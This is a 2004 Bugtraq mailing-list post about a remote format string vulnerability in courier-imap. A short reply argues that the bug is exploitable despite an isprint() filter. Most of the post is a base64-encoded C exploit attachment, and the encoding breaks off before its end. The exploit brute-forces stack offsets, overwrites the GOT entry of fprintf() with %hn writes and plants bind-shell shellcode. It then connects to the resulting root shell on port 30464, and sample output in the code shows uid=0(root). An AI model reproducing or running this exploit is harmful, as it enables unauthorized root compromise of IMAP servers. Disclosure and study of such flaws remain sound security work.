[36253] in bugtraq
Re: [ GLSA 200408-19 ] courier-imap: Remote Format String Vulnerability
daemon@ATHENA.MIT.EDU (ktha@hush.com)
Tue Aug 24 22:38:32 2004
Message-Id: <200408241050.i7OAodA9092247@mailserver3.hushmail.com>
Date: Tue, 24 Aug 2004 03:50:37 -0700
To: bugtraq@securityfocus.com
Cc:
From: <ktha@hush.com>
MIME-Version: 1.0
Content-type: multipart/mixed; boundary="Hush_boundary-412b1d7d48dbb"
--Hush_boundary-412b1d7d48dbb
Content-type: text/plain
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hi!
I think that the isprint() check is NOT limiting the exploitation of
this bug at all. You can still exploit this vulnerability by overwriting
stack frames (you can read more about it here: http://www.phrack.org/show.php?p=59&a=7)
and by using the shellcode as the password field which will be located
on the heap. So, this would be exploitable even on no-exec stacks. There
are some limitations of this technique, it does not work on latest Linux
glibcs, but on FreeBSD and Solaris is doable.
I've attached a first version of my exploit for this vulnerability; it
was tested on a FreeBSD 4.10-RELEASE, thanks to andrewg.
>this can't be exploited to execute code, as any non printable characters
are
>turned into '.' before the buffer is passed to fprintf(). well actually,
if
>there is some platform where the relevant addresses can be reached with
only
>printable characters it's possible, but i'm not aware of any such platform.
>
Andrei Catalin aka ktha
ktha at hush dot com
[ Need a challenge ? ]
[ Visit http://www.pulltheplug.com ]
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkErHYEACgkQsV/nUjPdEq5v3ACghGvRGHH0swz60I0V9d6wq66j8rYA
oKmE0Amk48PZ7wgEkbT851sl0fJA
=N/5B
-----END PGP SIGNATURE-----
--Hush_boundary-412b1d7d48dbb
Content-type: application/octet-stream; name="sm00ny-courier_imap_fsx.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sm00ny-courier_imap_fsx.c"
LyogIAogICAgY291cmllci1pbWFwIDw9IDMuMC4yLXIxIFJlbW90ZSBGb3JtYXQgU3RyaW5nIFZ1
bG5lcmFiaWxpdHkgZXhwbG9pdAogICAgCiAgICBBdXRob3I6IGt0aGEgYXQgaHVzaCBkb3QgY29t
IAogICAgCiAgICBUZXN0ZWQgb24gRnJlZUJTRCA0LjEwLVJFTEVBU0Ugd2l0aCBjb3VyaWVyLWlt
YXAtMy4wLjIKICAgIAogICAgU3BlY2lhbCB0aGFua3MgZ29lcyB0byBhbmRyZXdnIGZvciBwcm92
aWRpbmcgdGhlIEZyZWVCU0QgYm94LgogICAgCiAgICBHcmVldGluZ3M6IGFsbCB0aGUgZ3V5cyBm
cm9tIGlyYy5wdWxsdGhlcGx1Zy5jb20gYW5kIGlyYy5uZXRyaWMub3JnCiAgICAKICAgIGJhc2gt
Mi4wNWIkIC4vc20wMG55LWNvdXJpZXJfaW1hcF9mc3gKICAgIGNvdXJpZXItaW1hcCA8PSAzLjAu
Mi1yMSBSZW1vdGUgRm9ybWF0IFN0cmluZyBWdWxuZXJhYmlsaXR5IGV4cGxvaXQgYnkga3RoYSBh
dCBodXNoIGRvdCBjb20KICAgIFsqXSBMYXVuY2hpbmcgYXR0YWNrIGFnYWluc3QgMTI3LjAuMC4x
OjE0MwogICAgWytdIEdvdCBjdXJyZW50IGVicCg1MTAwKTogMHhiZmJmYjA1MAogICAgWytdIEdv
dCBwb3NzaWJsZSBzYXZlZCBlYnAoMzI4MSk6IDB4YmZiZmUzOTAKICAgIFsrXSBHb3QgcG9zc2li
bGUgd3JpdGUgb24gdGhlIHN0YWNrIHBvaW50ZXIoMzI5Myk6IDB4YmZiZmUzYzAKICAgIFsrXSBW
ZXJpZnlpbmcuLi5mYWlsZWQKICAgIFsrXSBHb3QgcG9zc2libGUgc2F2ZWQgZWJwKDMyODYpOiAw
eGJmYmZlM2E0CiAgICBbK10gR290IHBvc3NpYmxlIHdyaXRlIG9uIHRoZSBzdGFjayBwb2ludGVy
KDMyOTgpOiAweGJmYmZlM2Q0CiAgICBbK10gVmVyaWZ5aW5nLi4uZmFpbGVkCiAgICBbK10gR290
IHBvc3NpYmxlIHNhdmVkIGVicCgzMjg3KTogMHhiZmJmZTNhOAogICAgWytdIEdvdCBwb3NzaWJs
ZSB3cml0ZSBvbiB0aGUgc3RhY2sgcG9pbnRlcigzMjk5KTogMHhiZmJmZTNkOAogICAgWytdIFZl
cmlmeWluZy4uLk9LCiAgICBbK10gQnVpbGRpbmcgZm10Li4uZG9uZQogICAgWytdIEJ1aWxkaW5n
IHNoZWxsY29kZS4uLmRvbmUKICAgIFsqXSBVc2luZyByZXQ6IDB4ODA1NzAwMAogICAgWypdIFVz
aW5nIGdvdCBvZiBmcHJpbnRmKCk6IDB4ODA0ZmVmYwogICAgWypdIENoZWNraW5nIGZvciBzaGVs
bC4uCiAgICB1aWQ9MChyb290KSBnaWQ9MCh3aGVlbCkgZ3JvdXBzPTAod2hlZWwpLCAyKGttZW0p
LCAzKHN5cyksIDQodHR5KSwgNShvcGVyYXRvciksIDIwKHN0YWZmKSwgMzEoZ3Vlc3QpCgkgICAg
CiAgICBOLkIuICAxLiByZXQgY2FuIGJlIGd1ZXNzZWQgOykKICAgICAgICAgIDIuIGdvdCwgd2Vs
bC4uIHRoYXQncyBhIGRpZmZlcmVudCBzdG9yeSwgaXQgbXVzdCBiZSBicnV0ZWZvcmNlZAogICAg
ICAgICAgMy4gImNlX251bWJlciIgJiAgInNlX251bWJlciIgY2FuIGJlIHNldCB3aXRoIHNvbWUg
ZGVmYXVsdCB2YWx1ZXMgd2hlbiBydW5uaW5nIG11bHRpcGxlIHRpbWVzCgkgIDQuIHNoZWxsIGlz
IHVzYWJsZSBmb3IgYXByb3ggMSBtaW4gICAgIAogICAgCSAgCiAgICBbIE5lZWQgYSBjaGFsbGVu
Z2UgPyAgICAgICAgICAgICAgICAgIF0KICAgIFsgICAgVmlzaXQgaHR0cDovL3d3dy5wdWxsdGhl
cGx1Zy5jb20gXQogICAgCiovCgojaW5jbHVkZSA8c3RkbGliLmg+CiNpbmNsdWRlIDx1bmlzdGQu
aD4KI2luY2x1ZGUgPHN5cy90eXBlcy5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgojaW5jbHVk
ZSA8bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8YXJwYS9pbmV0Lmg+CiNpbmNsdWRlIDxuZXRkYi5o
PgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDxlcnJuby5oPgojaW5jbHVkZSA8c2lnbmFs
Lmg+CiNpbmNsdWRlIDxzdGRpby5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPGZj
bnRsLmg+CgojZGVmaW5lIEJJR0JVRiAyMDQ4CgojZGVmaW5lIElNQVBfUE9SVCAxNDMKCiNkZWZp
bmUgRU5EX0JSVVRFRk9SQ0VfU1RBQ0sgNTUwMAoKI2RlZmluZSBUT1BfU1RBQ0sgMHhiZmMwMDAw
MCAvKiBGcmVlQlNEICovCgojZGVmaW5lIFNUQVJUX0JSVVRFRk9SQ0VfU0FWRURfRUJQIDMwMDAK
CiNkZWZpbmUgSlVOSyA5CgojZGVmaW5lIEdBUF9FQlBfRVNQIDQ4CgojZGVmaW5lIERVTU1ZX05V
TUJFUiAxMDAKCgp2b2lkIGRpZShpbnQgdHlwZSwgY2hhciAqbWVzc2FnZSkgewoJaWYodHlwZSA9
PSAyKQoJCXBlcnJvcihtZXNzYWdlKTsKICAgICAgICBlbHNlCiAgICAgICAgCWZwcmludGYoc3Rk
ZXJyLCIlc1xuIixtZXNzYWdlKTsKCWV4aXQoMSk7Cn0KCmludCBjb25uZWN0X3RvIChjaGFyICpo
b3N0LCBpbnQgcG9ydCl7CiAgc3RydWN0IGhvc3RlbnQgKmg7CiAgc3RydWN0IHNvY2thZGRyX2lu
IGM7CiAgaW50IHNvY2s7CgogIGlmICgoaG9zdCA9PSBOVUxMKSB8fCAoKmhvc3QgPT0gKGNoYXIp
IDApKQogICAgICBkaWUoMSwgIlstXSBJbnZhbGlkIGhvc3RuYW1lIik7CgogIGlmICgoYy5zaW5f
YWRkci5zX2FkZHIgPSBpbmV0X2FkZHIgKGhvc3QpKSA9PSAtMSl7CiAgICAgIGlmICgoaCA9IGdl
dGhvc3RieW5hbWUgKGhvc3QpKSA9PSBOVUxMKQoJICBkaWUoMSwgIlstXSBDYW5ub3QgcmVzb2x2
ZSBob3N0Iik7CiAgICAgIG1lbWNweSAoKGNoYXIgKikgJmMuc2luX2FkZHIsIChjaGFyICopIGgt
PmhfYWRkciwgc2l6ZW9mIChjLnNpbl9hZGRyKSk7CiAgfQogIGlmICgoc29jayA9IHNvY2tldCAo
UEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpCiAgICAgIGRpZSgyLCJb
LV0gRXJyb3IgY3JlYXRpbmcgc29ja2V0OiIpOwogIGMuc2luX2ZhbWlseSA9IFBGX0lORVQ7CiAg
Yy5zaW5fcG9ydCA9IGh0b25zIChwb3J0KTsKICBpZiAoY29ubmVjdCAoc29jaywgKHN0cnVjdCBz
b2NrYWRkciAqKSAmYywgc2l6ZW9mIChjKSkgPT0gLTEpCiAgICAgIGRpZSgyLCAiWy1dIENhbm5v
dCBjb25uZWN0OiAiKTsKICByZXR1cm4gc29jazsKfQoKdm9pZCBjbG9zZV9zb2NrZXQgKGludCBz
b2NrKXsKICBzaHV0ZG93biAoc29jaywgMik7CiAgY2xvc2UgKHNvY2spOwp9CgpjaGFyICpnZXRf
cmVxdWVzdChjaGFyICp1c2VybmFtZSwgY2hhciAqcGFzc3dvcmQpewogIGNoYXIgKnJlcXVlc3Qg
PSAoY2hhciAqKW1hbGxvYyhzdHJsZW4odXNlcm5hbWUpK3N0cmxlbihwYXNzd29yZCkrMjApOwog
IHNwcmludGYocmVxdWVzdCwiMSBMT0dJTiBcIiVzXCIgXCIlc1wiXHJcbiIsdXNlcm5hbWUsIHBh
c3N3b3JkKTsKICByZXR1cm4gcmVxdWVzdDsKfQoKdm9pZCBzZW5kX2RhdGEoaW50IHNvY2ssIGNo
YXIgKnJlcXVlc3QpewoJaW50IG47CgluID0gc2VuZCAoc29jaywgcmVxdWVzdCwgc3RybGVuIChy
ZXF1ZXN0KSwgMCk7CglpZiAobiAhPSBzdHJsZW4gKHJlcXVlc3QpKXsKICAgICAgICAgICAgICAg
IGNsb3NlX3NvY2tldCAoc29jayk7CiAgICAgICAgICAgICAgICBkaWUoMSwgIkVycm9yIHNlbmRp
bmcgcmVxdWVzdFxuIik7Cgl9ICAgICAgICAgICAgICAgICAgCn0KCgppbnQgZ2V0X2NlX251bWJl
cihjaGFyICpob3N0LCBpbnQgcG9ydCl7CglpbnQgc29jazsKCWludCBsb29wOwoJY2hhciB0ZW1w
W0JJR0JVRl07CglpbnQgbCxuOwoJY2hhciB1c2VybmFtZVtCSUdCVUZdOwoJY2hhciBwYXNzd29y
ZFtCSUdCVUZdOwoJY2hhciAqcmVxdWVzdDsKCQoJZm9yIChsb29wID0gRU5EX0JSVVRFRk9SQ0Vf
U1RBQ0s7O2xvb3AtLSl7CgkJc29jayA9IGNvbm5lY3RfdG8oaG9zdCwgcG9ydCk7CgkJbiA9IHJl
Y3YgKHNvY2ssIHRlbXAsIHNpemVvZiAodGVtcCksIDApOwoJCXNwcmludGYocGFzc3dvcmQsInNt
MDBueSIpOwoJCXNwcmludGYodXNlcm5hbWUsIiUlJWQkcCIsbG9vcCk7CgkJcmVxdWVzdCA9IGdl
dF9yZXF1ZXN0KHVzZXJuYW1lLHBhc3N3b3JkKTsKCQlzZW5kX2RhdGEoc29jayxyZXF1ZXN0KTsK
CQltZW1zZXQodGVtcCwwLHNpemVvZih0ZW1wKSk7CgkJbiA9IHJlY3YgKHNvY2ssIHRlbXAsIHNp
emVvZiAodGVtcCksIDApOwoJCWNsb3NlX3NvY2tldCAoc29jayk7CgkJaWYgKG4gPiAwKQoJCQli
cmVhazsKCX0JCglyZXR1cm4gbG9vcDsKfQoKCmludCBnZXRfc2VfbnVtYmVyKGludCBzdGFydCwg
aW50IGVuZCwgY2hhciAqaG9zdCwgaW50IHBvcnQpewoJaW50IGxvb3A7CgljaGFyIHVzZXJuYW1l
W0JJR0JVRl07CgljaGFyIHBhc3N3b3JkW0JJR0JVRl07CgljaGFyICpyZXF1ZXN0OwoJaW50IGws
bjsKCWNoYXIgdGVtcFtCSUdCVUZdOwoJaW50IHNvY2s7CglpZiAoIXN0YXJ0KQoJCXN0YXJ0ID0g
U1RBUlRfQlJVVEVGT1JDRV9TQVZFRF9FQlA7Cglmb3IgKGxvb3AgPSBzdGFydDsgbG9vcCA8IGVu
ZDsgbG9vcCsrKXsKCQlzb2NrID0gY29ubmVjdF90byhob3N0LCBwb3J0KTsKCQluID0gcmVjdiAo
c29jaywgdGVtcCwgc2l6ZW9mICh0ZW1wKSwgMCk7CgkJc3ByaW50ZihwYXNzd29yZCwic20wMG55
Iik7CgkJc3ByaW50Zih1c2VybmFtZSwiJSUlZCRuIixsb29wKTsKCQlyZXF1ZXN0ID0gZ2V0X3Jl
cXVlc3QodXNlcm5hbWUscGFzc3dvcmQpOwoJCXNlbmRfZGF0YShzb2NrLHJlcXVlc3QpOwoJCW1l
bXNldCh0ZW1wLDAsc2l6ZW9mKHRlbXApKTsKCQluID0gcmVjdiAoc29jaywgdGVtcCwgc2l6ZW9m
ICh0ZW1wKSwgMCk7CgkJY2xvc2Vfc29ja2V0IChzb2NrKTsKCQlpZiAobiA+IDApCgkJCWJyZWFr
OwoJfQoJaWYgKGxvb3AgPT0gZW5kKQoJCXJldHVybiAtMTsKCQkKCXJldHVybiBsb29wOwp9CgoK
CgoKaW50IHZlcmlmeV9zZV9udW1iZXIoaW50IHdyaXRlLCB1bnNpZ25lZCBsb25nIGFkZHksIGlu
dCBudW1iZXIsIGNoYXIgKmhvc3QsIGludCBwb3J0KXsKICAgICAgICBjaGFyIHVzZXJuYW1lW0JJ
R0JVRl07CiAgICAgICAgY2hhciBwYXNzd29yZFtCSUdCVUZdOwogICAgICAgIGNoYXIgdGVtcFtC
SUdCVUZdOwogICAgICAgIGNoYXIgKnJlcXVlc3Q7CiAgICAgICAgaW50IG4sIHNvY2s7CiAgICAg
ICAgCiAgICAgICAgc29jayA9IGNvbm5lY3RfdG8oaG9zdCwgcG9ydCk7CiAgICAgICAgbWVtc2V0
KHRlbXAsMCxzaXplb2YodGVtcCkpOwogICAgICAgIG4gPSByZWN2IChzb2NrLCB0ZW1wLCBzaXpl
b2YgKHRlbXApLCAwKTsKICAgICAgICBzcHJpbnRmKHBhc3N3b3JkLCJzbTAwbnkiKTsKICAgICAg
ICBzcHJpbnRmKHVzZXJuYW1lLCIlJSV1dSUlJXUkaG4lJSV1JGhuIiwgKGFkZHkgJiAweGZmZmYp
IC0gSlVOSywgbnVtYmVyLCB3cml0ZSk7CiAgICAgICAgcmVxdWVzdCA9IGdldF9yZXF1ZXN0KHVz
ZXJuYW1lLHBhc3N3b3JkKTsKICAgICAgICBzZW5kX2RhdGEoc29jayxyZXF1ZXN0KTsKICAgICAg
ICBtZW1zZXQodGVtcCwwLHNpemVvZih0ZW1wKSk7CiAgICAgICAgbiA9IHJlY3YgKHNvY2ssIHRl
bXAsIHNpemVvZiAodGVtcCksIDApOwogICAgICAgIGNsb3NlX3NvY2tldCAoc29jayk7CiAgICAg
ICAgaWYgKG4gPD0gMCkKICAgICAgICAJcmV0dXJuIDA7CiAgICAgICAgCQogICAgICAgIHNvY2sg
PSBjb25uZWN0X3RvKGhvc3QsIHBvcnQpOwogICAgICAgIG1lbXNldCh0ZW1wLDAsc2l6ZW9mKHRl
bXApKTsKICAgICAgICBuID0gcmVjdiAoc29jaywgdGVtcCwgc2l6ZW9mICh0ZW1wKSwgMCk7CiAg
ICAgICAgc3ByaW50ZihwYXNzd29yZCwic20wMG55Iik7CiAgICAgICAgc3ByaW50Zih1c2VybmFt
ZSwiJSUldSRuJSUldSRobiIsIG51bWJlciwgd3JpdGUpOwogICAgICAgIHJlcXVlc3QgPSBnZXRf
cmVxdWVzdCh1c2VybmFtZSxwYXNzd29yZCk7CiAgICAgICAgc2VuZF9kYXRhKHNvY2sscmVxdWVz
dCk7CiAgICAgICAgbWVtc2V0KHRlbXAsMCxzaXplb2YodGVtcCkpOwogICAgICAgIG4gPSByZWN2
IChzb2NrLCB0ZW1wLCBzaXplb2YgKHRlbXApLCAwKTsKICAgICAgICBjbG9zZV9zb2NrZXQgKHNv
Y2spOwogICAgICAgIGlmIChuID4gMCkKICAgICAgICAJcmV0dXJuIDA7CiAgICAgICAgCQogICAg
ICAgIHJldHVybiAxOwp9CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCmludCAqZ2V0X2Zvcm1hdF92ZWN0
b3IodW5zaWduZWQgbG9uZyBnb3RfYWRkeSwgdW5zaWduZWQgbG9uZyBnb3QsIHVuc2lnbmVkIGxv
bmcgcmV0KXsKCWludCBpLGosc3VtLGJ5dGU7CglpbnQgKnZlYyA9IChpbnQgKiltYWxsb2MoMTEg
KiBzaXplb2YoaW50KSk7CgkKCXN1bSA9IEpVTks7Cglmb3IgKGk9MDsgaTwyOyBpKyspewoJCWZv
ciAoaj0wOyBqPDI7IGorKyl7CgkJCXZlY1syKigyICogaSArIGopXSA9IChnb3RfYWRkeSAmIDB4
ZmZmZikgLSBzdW07CgkJCXdoaWxlICh2ZWNbMiooMiAqIGkgKyBqKV0gPD0gMTIpCgkJCQl2ZWNb
MiooMiAqIGkgKyBqKV0gKz0gMHgxMDAwMDsKCQkJc3VtICs9IHZlY1syKigyICogaSArIGopXTsK
CQkJCgkJCWJ5dGUgPSAoKGdvdCArIDIgKiBpKSA+PiAoMTYqaikpICYgMHhmZmZmOwoJCQl2ZWNb
MiooMiAqIGkgKyBqKSArIDFdID0gYnl0ZSAtIHN1bTsKCQkJd2hpbGUgKHZlY1syKigyICogaSAr
IGopICsgMV0gPD0gMTIpCgkJCQl2ZWNbMiooMiAqIGkgKyBqKSArIDFdICs9IDB4MTAwMDA7CgkJ
CXN1bSArPSB2ZWNbMiooMiAqIGkgKyBqKSArIDFdOwoJCQlnb3RfYWRkeSArPSAyOwoJCX0KCX0K
CWZvciAoaT0wOyBpPDI7IGkrKyl7CgkJYnl0ZSA9IChyZXQgPj4gKDE2KmkpKSAmIDB4ZmZmZjsK
CQl2ZWNbOCtpXSA9IGJ5dGUgLSBzdW07CgkJd2hpbGUgKHZlY1s4K2ldIDw9IDEyKQoJCQl2ZWNb
OCtpXSArPSAweDEwMDAwOwoJCXN1bSArPSB2ZWNbOCtpXTsKCX0KCQoJcmV0dXJuIHZlYzsKfQoK
Y2hhciAqZ2V0X2Zvcm1hdF9zdHJpbmcoaW50ICp2ZWMsIGludCBzZV9udW1iZXIsIGludCB3cml0
ZV9udW1iZXIsIGludCBnb3RfbnVtYmVyKXsKCWNoYXIgKmJ1ZiA9IChjaGFyICopIG1hbGxvYyhC
SUdCVUYpOwoJY2hhciBzbWFsbGJ1ZlsyNTZdOwoJaW50IGk7CgkKCWZvciAoaT0wOyBpPDQ7IGkr
Kyl7CgkJc3ByaW50ZihzbWFsbGJ1ZiAsIiUlJXV1JSUldSRobiUlJXV1JSUldSRobiIsdmVjWzIq
aV0sc2VfbnVtYmVyLHZlY1syKmkrMV0sd3JpdGVfbnVtYmVyKTsKCQlzdHJjYXQoYnVmLHNtYWxs
YnVmKTsKCX0KCWZvciAoaT0wOyBpPDI7IGkrKyl7CgkJc3ByaW50ZihzbWFsbGJ1ZiwiJSUldXUl
JSV1JGhuIix2ZWNbOCArIGldLGdvdF9udW1iZXIgKyBpKTsKCQlzdHJjYXQoYnVmLHNtYWxsYnVm
KTsKCX0KCXJldHVybiBidWY7Cn0KCgpjaGFyICpnZW5fc2hlbGxjb2RlIChpbnQgZ2FwKXsKCWlu
dCBzaXplOwoJY2hhciAqcDsKCWNoYXIgc2hlbGxjb2RlW10gPQoJLyogVGhhbmtzIGlsamEgKi8K
CSJceDMxXHhjMFx4MzFceGM5XHgzMVx4ZDJceGIwXHg2MSIKCSJceDUxXHhiMVx4MDZceDUxXHhi
MVx4MDFceDUxXHhiMSIKCSJceDAyXHg1MVx4OGRceDBjXHgyNFx4NTFceGNkXHg4MCIKCSJceGIx
XHgwMlx4MzFceGM5XHg1MVx4NTFceDUxXHg4MCIKCSJceGMxXHg3N1x4NjZceDUxXHhiNVx4MDJc
eDY2XHg1MSIKCSJceDhkXHgwY1x4MjRceGIyXHgxMFx4NTJceDUxXHg1MCIKCSJceDhkXHgwY1x4
MjRceDUxXHg4OVx4YzJceDMxXHhjMCIKCSJceGIwXHg2OFx4Y2RceDgwXHhiM1x4MDFceDUzXHg1
MiIKCSJceDhkXHgwY1x4MjRceDUxXHgzMVx4YzBceGIwXHg2YSIKCSJceGNkXHg4MFx4MzFceGMw
XHg1MFx4NTBceDUyXHg4ZCIKCSJceDBjXHgyNFx4NTFceDMxXHhjOVx4YjBceDFlXHhjZCIKCSJc
eDgwXHg4OVx4YzNceDUzXHg1MVx4MzFceGMwXHhiMCIKCSJceDVhXHhjZFx4ODBceDQxXHg1M1x4
NTFceDMxXHhjMCIKCSJceGIwXHg1YVx4Y2RceDgwXHg0MVx4NTNceDUxXHgzMSIKCSJceGMwXHhi
MFx4NWFceGNkXHg4MFx4MzFceGRiXHg1MyIKCSJceDY4XHg2ZVx4MmZceDczXHg2OFx4NjhceDJm
XHgyZiIKCSJceDYyXHg2OVx4ODlceGUzXHgzMVx4YzBceDUwXHg1NCIKCSJceDUzXHg1MFx4YjBc
eDNiXHhjZFx4ODBceDMxXHhjMCIKCSJceGIwXHgwMVx4Y2RceDgwIjsKCSAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIAoJCiAgICAgICAgc2l6ZSA9IHN0cmxlbiAoc2hlbGxjb2RlKTsKCXAg
PSAoY2hhciAqKSBtYWxsb2MgKGdhcCArIDEpOwoJCgkvKiBTb21lIG5vcHMgOykgKi8KCW1lbXNl
dCAocCwgMHg0MSwgZ2FwKTsKCQoJbWVtY3B5IChwICsgZ2FwIC0gc2l6ZSwgc2hlbGxjb2RlLCBz
aXplICsgMSk7CglyZXR1cm4gcDsKfQoKCnZvaWQgcm9vdChjaGFyICpob3N0KSB7CglmZF9zZXQg
cmZkczsKICAgICAgICBpbnQgbjsKICAgICAgICBpbnQgc29jazsKICAgICAgICBjaGFyIGJ1ZmZb
MTAyNF07CiAgICAgICAgCiAgICAgICAgc29jayA9IGNvbm5lY3RfdG8oaG9zdCwzMDQ2NCk7CiAg
ICAgICAgc2VuZChzb2NrLCJpZDtcbiIsNCwwKTsKICAgICAgICB3aGlsZSgxKSB7CiAgICAgICAg
CUZEX1pFUk8oJnJmZHMpOwogICAgICAgIAlGRF9TRVQoMCwgJnJmZHMpOwogICAgICAgICAgICAg
ICAgRkRfU0VUKHNvY2ssICZyZmRzKTsKICAgICAgICAgICAgICAgIGlmKHNlbGVjdChzb2NrKzEs
ICZyZmRzLCBOVUxMLCBOVUxMLCBOVUxMKSA8IDEpCiAgICAgICAgICAgICAgICAJZXhpdCgwKTsK
ICAgICAgICAgICAgICAgIGlmKEZEX0lTU0VUKDAsJnJmZHMpKSB7CiAgICAgICAgICAgICAgICAJ
aWYoIChuID0gcmVhZCgwLGJ1ZmYsc2l6ZW9mKGJ1ZmYpKSkgPCAxKQogICAgICAgICAgICAgICAg
CQlleGl0KDApOwogICAgICAgICAgICAgICAgCWlmKCBzZW5kKHNvY2ssYnVmZixuLDApICE9IG4p
CiAgICAgICAgICAgICAgICAJCWV4aXQoMCk7CiAgICAgICAgICAgICAgIAl9CiAgICAgICAgICAg
ICAgICBpZihGRF9JU1NFVChzb2NrLCZyZmRzKSkgewogICAgICAgICAgICAgICAgCWlmKCAobiA9
IHJlY3Yoc29jayxidWZmLHNpemVvZihidWZmKSwwKSkgPCAxKQogICAgICAgICAgICAgICAgCQll
eGl0KDApOwogICAgICAgICAgICAgICAgCXdyaXRlKDEsYnVmZixuKTsKICAgICAgICAgICAgICAg
IH0KCX0KfQoKCgptYWluIChpbnQgYXJnYywgY2hhciAqKmFyZ3YpIHsKICBjaGFyICpob3N0PSIx
MjcuMC4wLjEiOwogIGludCBwb3J0ID0gSU1BUF9QT1JUOwogIGludCBzb2NrOwogIAogIGNoYXIg
KnRlbXAxLCAqdGVtcDI7CiAgY2hhciAqcmVxdWVzdDsKICBpbnQgKnZlYzsKICAKICBpbnQgbixv
ayxpOwogIAogIHVuc2lnbmVkIGxvbmcgY3VyX2VicDsgLy8gd2FzIDUxMDAgb24gbXkgYm94CiAg
aW50IGNlX251bWJlciA9IDA7CiAgdW5zaWduZWQgbG9uZyBzYXZlZF9lYnA7ICAvLyB3YXMgMzI4
NyBvbiBteSBib3gKICBpbnQgc2VfbnVtYmVyID0gMDsKICB1bnNpZ25lZCBsb25nIHdyaXRlX2Fk
ZHk7IAogIGludCB3cml0ZV9udW1iZXIgPSAwOwogIHVuc2lnbmVkIGxvbmcgZ290X2FkZHk7CiAg
aW50IGdvdF9udW1iZXIgPSAwOwogIAogIC8qIG9iamR1bXAgLVIgL3Vzci9saWIvY291cmllci1p
bWFwL3NiaW4vaW1hcGxvZ2luIHwgZ3JlcCBmcHJpbnRmICovCiAgdW5zaWduZWQgbG9uZyBnb3Qg
PSAweDA4MDRmZWZjOwogIC8qIGhlaC4uIGl0J3MgdXAgdG8geW91IHRvIGZpbmQgdGhpcyBvbmUg
OlAgIEp1c3QgdXNlIHlvdXIgZmF2b3VyaXRlIG1hdGhvZCAqLwogIHVuc2lnbmVkIGxvbmcgcmV0
ID0gMHg4MDU3MDAwOwogICAgCiAgaWYgKGFyZ2MgPiAxKQogICAgaG9zdCA9IGFyZ3ZbMV07Cgog
IHByaW50ZigiY291cmllci1pbWFwIDw9IDMuMC4yLXIxIFJlbW90ZSBGb3JtYXQgU3RyaW5nIFZ1
bG5lcmFiaWxpdHkgZXhwbG9pdCBieSBrdGhhIGF0IGh1c2ggZG90IGNvbVxuIik7CiAgCiAgcHJp
bnRmKCJbKl0gTGF1bmNoaW5nIGF0dGFjayBhZ2FpbnN0ICVzOiVkXG4iLGhvc3QscG9ydCk7CiAg
CiAgaWYgKGNlX251bWJlciA9PSAwKQogIAljZV9udW1iZXIgPSBnZXRfY2VfbnVtYmVyKGhvc3Qs
cG9ydCk7CiAgY3VyX2VicCA9IFRPUF9TVEFDSyAtIDQgKiBjZV9udW1iZXI7CiAgCiAgZ290X251
bWJlciA9IERVTU1ZX05VTUJFUjsKICBnb3RfYWRkeSA9IGN1cl9lYnAgKyA0ICogKGdvdF9udW1i
ZXIgLSAxKTsKICAgIAogIHByaW50ZigiWytdIEdvdCBjdXJyZW50IGVicCglZCk6ICVwXG4iLGNl
X251bWJlcixjdXJfZWJwKTsKICAKICBkb3sKICAJc2VfbnVtYmVyID0gZ2V0X3NlX251bWJlcihz
ZV9udW1iZXIsY2VfbnVtYmVyLGhvc3QscG9ydCk7CiAgCWlmIChzZV9udW1iZXIgPT0gLTEpCiAg
CQlkaWUoMSwiWy1dIEZhaWxlZCB0byBnZXQgYSBzYXZlZF9lYnAgISIpOwogIAkKICAJc2F2ZWRf
ZWJwID0gY3VyX2VicCArIDQgKiAoc2VfbnVtYmVyIC0gMSk7CiAgCXByaW50ZigiWytdIEdvdCBw
b3NzaWJsZSBzYXZlZCBlYnAoJWQpOiAlcFxuIixzZV9udW1iZXIsc2F2ZWRfZWJwKTsKICAJCiAg
CXdyaXRlX2FkZHkgPSBHQVBfRUJQX0VTUCArIHNhdmVkX2VicDsKICAJd3JpdGVfbnVtYmVyID0g
KHdyaXRlX2FkZHkgLSBjdXJfZWJwKSAvIDQgKyAxOwoJcHJpbnRmKCJbK10gR290IHBvc3NpYmxl
IHdyaXRlIG9uIHRoZSBzdGFjayBwb2ludGVyKCVkKTogJXBcbiIsd3JpdGVfbnVtYmVyLHdyaXRl
X2FkZHkpOwoJICAJCiAgCXByaW50ZigiWytdIFZlcmlmeWluZy4uLiIpOwogIAlvayA9IHZlcmlm
eV9zZV9udW1iZXIod3JpdGVfbnVtYmVyLGdvdF9hZGR5LHNlX251bWJlcixob3N0LHBvcnQpOwog
IAlpZiAob2spCiAgCQlwcmludGYoIk9LXG4iKTsKICAJZWxzZSB7CiAgCQlwcmludGYoImZhaWxl
ZFxuIik7CiAgCQlzZV9udW1iZXIrKzsKICAJfQogIH13aGlsZSAoIW9rKTsKICAKICBwcmludGYo
IlsrXSBCdWlsZGluZyBmbXQuLi4iKTsKICB2ZWMgPSBnZXRfZm9ybWF0X3ZlY3Rvcihnb3RfYWRk
eSxnb3QscmV0KTsKICB0ZW1wMSA9IGdldF9mb3JtYXRfc3RyaW5nKHZlYyxzZV9udW1iZXIsd3Jp
